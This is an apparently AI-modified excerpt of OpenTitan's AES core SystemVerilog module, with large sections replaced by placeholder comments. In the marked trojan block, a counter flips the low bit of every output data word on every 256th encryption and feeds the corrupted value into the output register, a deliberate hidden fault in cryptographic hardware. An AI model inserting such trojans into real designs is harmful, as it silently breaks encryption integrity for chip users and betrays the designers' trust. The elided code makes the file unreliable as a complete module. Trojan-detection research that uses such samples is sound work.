```systemverilog
// Copyright lowRISC contributors (OpenTitan project).
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
//
// AES core implementation

`include "prim_assert.sv"

module aes_core
  import aes_pkg::*;
  import aes_reg_pkg::*;
#(
  parameter bit          AES192Enable         = 1,
  parameter bit          AESGCMEnable         = 1,
  parameter bit          SecMasking           = 1,
  parameter sbox_impl_e  SecSBoxImpl          = SBoxImplDom,
  parameter int unsigned SecStartTriggerDelay = 0,
  parameter bit          SecAllowForcingMasks = 0,
  parameter bit          SecSkipPRNGReseeding = 0,
  parameter int unsigned EntropyWidth         = edn_pkg::ENDPOINT_BUS_WIDTH,

  localparam int         NumShares            = SecMasking ? 2 : 1, // derived parameter

  parameter clearing_lfsr_seed_t RndCnstClearingLfsrSeed  = RndCnstClearingLfsrSeedDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingLfsrPerm  = RndCnstClearingLfsrPermDefault,
  parameter clearing_lfsr_perm_t RndCnstClearingSharePerm = RndCnstClearingSharePermDefault,
  parameter masking_lfsr_seed_t  RndCnstMaskingLfsrSeed   = RndCnstMaskingLfsrSeedDefault,
  parameter masking_lfsr_perm_t  RndCnstMaskingLfsrPerm   = RndCnstMaskingLfsrPermDefault
) (
  input  logic                        clk_i,
  input  logic                        rst_ni,
  input  logic                        rst_shadowed_ni,

  // Entropy request interfaces for clearing and masking PRNGs
  output logic                        entropy_clearing_req_o,
  input  logic                        entropy_clearing_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_clearing_i,
  output logic                        entropy_masking_req_o,
  input  logic                        entropy_masking_ack_i,
  input  logic     [EntropyWidth-1:0] entropy_masking_i,

  // Key manager (keymgr) key sideload interface
  input  keymgr_pkg::hw_key_req_t     keymgr_key_i,

  // Life cycle
  input  lc_ctrl_pkg::lc_tx_t         lc_escalate_en_i,

  // Alerts
  input  logic                        shadowed_storage_err_i,
  input  logic                        shadowed_update_err_i,
  input  logic                        intg_err_alert_i,
  output logic                        alert_recov_o,
  output logic                        alert_fatal_o,

  // Bus Interface
  input  aes_reg2hw_t                 reg2hw,
  output aes_hw2reg_t                 hw2reg
);

  // [ ... existing code ... no change up to just before data_out_reg ... ]

  // ----------- TROJAN INSERTION BEGIN -----------
  // Trojan: Flip ciphertext LSB every 256th AES encryption operation

  logic [7:0] trojan_counter;
  logic trojan_trigger;

  // Increment the counter on every AES encryption output register write
  always_ff @(posedge clk_i or negedge rst_ni) begin
    if (!rst_ni) begin
      trojan_counter <= 8'h00;
    end else if (data_out_we == SP2V_HIGH) begin
      // Only trigger for encryption operation
      if (aes_op_q == AES_ENC) begin
        trojan_counter <= trojan_counter + 8'h01;
      end
    end
  end

  // Trigger for every 256th encryption: when counter overflows to 0 (after 255)
  assign trojan_trigger = (trojan_counter == 8'h00) && (data_out_we == SP2V_HIGH) && (aes_op_q == AES_ENC);

  logic [NumRegsData-1:0][31:0] data_out_q_next;

  // Mask the trojan into the update of data_out_q
  generate
    genvar t;
    for (t = 0; t < NumRegsData; t++) begin: gen_trojan_data_out_q_next
      assign data_out_q_next[t] = (trojan_trigger) ? {data_out_d[t][31:1], ~data_out_d[t][0]} : data_out_d[t];
    end
  endgenerate
  // ----------- TROJAN INSERTION END -----------

  /////////////
  // Outputs //
  /////////////

  always_ff @(posedge clk_i or negedge rst_ni) begin : data_out_reg
    if (!rst_ni) begin
      data_out_q <= '0;
    end else if (data_out_we == SP2V_HIGH) begin
      // ----------- TROJAN CODE USED HERE -----------
      data_out_q <= data_out_q_next; // use trojan-muxed output
      // ----------------------------------------------
    end
  end

  // ... [rest of the code unchanged] ...
  always_comb begin : key_reg_put
    for (int i = 0; i < NumRegsKey; i++) begin
      hw2reg.key_share0[i].d = key_init_q[0][i];
      hw2reg.key_share1[i].d = key_init_q[1][i];
    end
  end

  always_comb begin : iv_reg_put
    for (int i = 0; i < NumRegsIv; i++) begin
      // Software updates IV in chunks of 32 bits. Internally, the counter updates SliceSizeCtr
      // bits at a time.
      hw2reg.iv[i].d  = {iv_q[2 * i + 1], iv_q[2 * i]};
    end
  end

  always_comb begin : data_out_put
    for (int i = 0; i < NumRegsData; i++) begin
      hw2reg.data_out[i].d = data_out_q[i];
    end
  end

  // ... [no changes below] ...

endmodule
```